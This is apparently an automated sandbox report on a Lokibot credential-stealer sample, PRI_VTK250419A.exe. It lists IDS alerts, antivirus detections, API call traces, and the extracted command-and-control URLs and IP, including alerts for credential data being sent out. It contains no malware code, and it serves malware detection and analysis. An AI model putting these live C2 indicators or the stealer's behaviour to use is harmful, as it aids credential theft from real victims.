Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-25T15:37:03.839421+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49704	104.21.80.1	80	TCP
2025-02-25T15:37:05.884395+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49705	104.21.80.1	80	TCP
2025-02-25T15:37:06.678043+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49706	104.21.80.1	80	TCP
2025-02-25T15:37:08.646573+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49707	104.21.80.1	80	TCP
2025-02-25T15:37:10.582091+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49708	104.21.80.1	80	TCP
2025-02-25T15:37:12.501734+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49709	104.21.80.1	80	TCP
2025-02-25T15:37:14.423788+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49710	104.21.80.1	80	TCP
2025-02-25T15:37:16.361092+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49711	104.21.80.1	80	TCP
2025-02-25T15:37:18.470114+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49717	104.21.80.1	80	TCP
2025-02-25T15:37:20.449634+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49725	104.21.80.1	80	TCP
2025-02-25T15:37:22.516317+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49741	104.21.80.1	80	TCP
2025-02-25T15:37:24.442832+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49752	104.21.80.1	80	TCP
2025-02-25T15:37:26.362703+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49764	104.21.80.1	80	TCP
2025-02-25T15:37:28.324980+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49779	104.21.80.1	80	TCP
2025-02-25T15:37:30.282636+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49792	104.21.80.1	80	TCP
2025-02-25T15:37:32.262945+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49804	104.21.80.1	80	TCP
2025-02-25T15:37:34.171066+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49819	104.21.80.1	80	TCP
2025-02-25T15:37:36.096465+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49832	104.21.80.1	80	TCP
2025-02-25T15:37:38.017545+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49846	104.21.80.1	80	TCP
2025-02-25T15:37:39.994212+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49860	104.21.80.1	80	TCP
2025-02-25T15:37:41.899055+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49873	104.21.80.1	80	TCP
2025-02-25T15:37:43.834928+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49886	104.21.80.1	80	TCP
2025-02-25T15:37:45.768346+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49900	104.21.80.1	80	TCP
2025-02-25T15:37:47.703387+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49912	104.21.80.1	80	TCP
2025-02-25T15:37:49.658365+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49927	104.21.80.1	80	TCP
2025-02-25T15:37:51.470383+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49938	104.21.80.1	80	TCP
2025-02-25T15:37:53.252481+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49951	104.21.80.1	80	TCP
2025-02-25T15:37:55.190339+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49966	104.21.80.1	80	TCP
2025-02-25T15:37:57.146055+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49981	104.21.80.1	80	TCP
2025-02-25T15:37:59.054566+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49993	104.21.80.1	80	TCP
2025-02-25T15:38:00.923982+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50004	104.21.80.1	80	TCP
2025-02-25T15:38:03.129955+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50007	104.21.80.1	80	TCP
2025-02-25T15:38:05.018828+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50008	104.21.80.1	80	TCP
2025-02-25T15:38:06.937484+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50009	104.21.80.1	80	TCP
2025-02-25T15:38:08.844857+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50010	104.21.80.1	80	TCP
2025-02-25T15:38:10.801171+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50011	104.21.80.1	80	TCP
2025-02-25T15:38:12.738105+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50012	104.21.80.1	80	TCP
2025-02-25T15:38:14.640871+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50013	104.21.80.1	80	TCP
2025-02-25T15:38:16.455340+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50014	104.21.80.1	80	TCP
2025-02-25T15:38:18.421744+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50015	104.21.80.1	80	TCP
2025-02-25T15:38:20.374351+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50016	104.21.80.1	80	TCP
2025-02-25T15:38:22.285474+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50017	104.21.80.1	80	TCP
2025-02-25T15:38:24.210909+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50018	104.21.80.1	80	TCP
2025-02-25T15:38:26.128727+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50019	104.21.80.1	80	TCP
2025-02-25T15:38:27.930674+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50020	104.21.80.1	80	TCP
2025-02-25T15:38:30.192910+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50021	104.21.80.1	80	TCP
2025-02-25T15:38:32.070314+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50022	104.21.80.1	80	TCP
2025-02-25T15:38:34.049302+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50023	104.21.80.1	80	TCP
2025-02-25T15:38:35.962917+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50024	104.21.80.1	80	TCP
2025-02-25T15:38:37.927242+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50025	104.21.80.1	80	TCP
2025-02-25T15:38:39.840894+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50026	104.21.80.1	80	TCP
2025-02-25T15:38:41.806917+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50027	104.21.80.1	80	TCP
2025-02-25T15:38:43.756691+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50028	104.21.80.1	80	TCP
2025-02-25T15:38:45.617770+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50029	104.21.80.1	80	TCP
2025-02-25T15:38:47.543151+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50030	104.21.80.1	80	TCP
2025-02-25T15:38:49.503055+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50031	104.21.80.1	80	TCP
2025-02-25T15:38:51.426845+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50032	104.21.80.1	80	TCP
2025-02-25T15:38:53.402371+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50033	104.21.80.1	80	TCP
2025-02-25T15:38:55.331665+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50034	104.21.80.1	80	TCP
2025-02-25T15:38:57.256281+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50035	104.21.80.1	80	TCP
2025-02-25T15:38:59.246009+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50036	104.21.80.1	80	TCP
2025-02-25T15:39:01.151194+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50037	104.21.80.1	80	TCP
2025-02-25T15:39:03.225173+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50038	104.21.80.1	80	TCP
2025-02-25T15:39:05.179203+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50039	104.21.80.1	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://touxzw.ir/scc1/five/fre.php

Avira URL Cloud: Label: malware

Found malware configuration

Source: 2.2.svchost.exe.400000.1.raw.unpack

Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}

Multi AV Scanner detection for submitted file

Source: PRI_VTK250419A.exe	Virustotal: Detection: 51%			Perma Link
Source: PRI_VTK250419A.exe	ReversingLabs: Detection: 55%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: PRI_VTK250419A.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: wntdll.pdbUGP source: PRI_VTK250419A.exe, 00000000.00000003.2058297108.0000000003AD0000.00000004.00001000.00020000.00000000.sdmp, PRI_VTK250419A.exe, 00000000.00000003.2056096029.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: PRI_VTK250419A.exe, 00000000.00000003.2058297108.0000000003AD0000.00000004.00001000.00020000.00000000.sdmp, PRI_VTK250419A.exe, 00000000.00000003.2056096029.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: svchost.exe, svchost.exe, 00000002.00000002.3293974619.0000000000191000.00000020.00000001.01000000.00000005.sdmp
Source:	Binary string: svchost.pdbUGP source: svchost.exe, 00000002.00000002.3293974619.0000000000191000.00000020.00000001.01000000.00000005.sdmp

Source: C:\Users\user\Desktop\PRI_VTK250419A.exe	Code function: 0_2_00C3445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00C3445A
Source: C:\Users\user\Desktop\PRI_VTK250419A.exe	Code function: 0_2_00C3C6D1 FindFirstFileW,FindClose,	0_2_00C3C6D1
Source: C:\Users\user\Desktop\PRI_VTK250419A.exe	Code function: 0_2_00C3C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_00C3C75C
Source: C:\Users\user\Desktop\PRI_VTK250419A.exe	Code function: 0_2_00C3EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00C3EF95
Source: C:\Users\user\Desktop\PRI_VTK250419A.exe	Code function: 0_2_00C3F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00C3F0F2
Source: C:\Users\user\Desktop\PRI_VTK250419A.exe	Code function: 0_2_00C3F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00C3F3F3
Source: C:\Users\user\Desktop\PRI_VTK250419A.exe	Code function: 0_2_00C337EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00C337EF
Source: C:\Users\user\Desktop\PRI_VTK250419A.exe	Code function: 0_2_00C33B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00C33B12
Source: C:\Users\user\Desktop\PRI_VTK250419A.exe	Code function: 0_2_00C3BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00C3BCBC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,	2_2_00403D74

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49725 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49725 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49725 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49709 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49706 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49708 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49706 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49708 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49706 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49779 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49779 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49779 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49705 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49705 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49709 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49708 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49725 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49764 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49725 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49764 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49764 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49711 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49711 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49705 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49711 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49779 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49779 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49709 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49764 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49764 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49710 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49710 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49710 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.5:49705 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49709 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49709 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49792 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49710 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49792 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49710 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49792 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49708 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49708 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49707 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49707 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49707 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49707 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49707 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.80.1:80 -> 192.168.2.5:49725
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49711 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49711 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49706 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.80.1:80 -> 192.168.2.5:49764
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49706 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49792 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49792 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.80.1:80 -> 192.168.2.5:49779
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49846 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49846 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49846 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49846 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49846 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49819 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49819 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49819 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49819 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49819 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49927 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49927 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49927 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49912 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49912 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49912 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49752 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49752 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49752 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49912 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49873 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49912 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49873 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49873 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49752 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49752 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49927 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49873 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49927 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49873 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.80.1:80 -> 192.168.2.5:49708
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.80.1:80 -> 192.168.2.5:49846
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.80.1:80 -> 192.168.2.5:49711
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.80.1:80 -> 192.168.2.5:49707
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49704 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49704 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49704 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49951 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49951 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49900 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49900 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49900 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.5:49704 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49900 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49900 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49886 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49886 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49886 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.80.1:80 -> 192.168.2.5:49927
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49951 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.80.1:80 -> 192.168.2.5:49752
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49717 -> 104.21.80.1:80
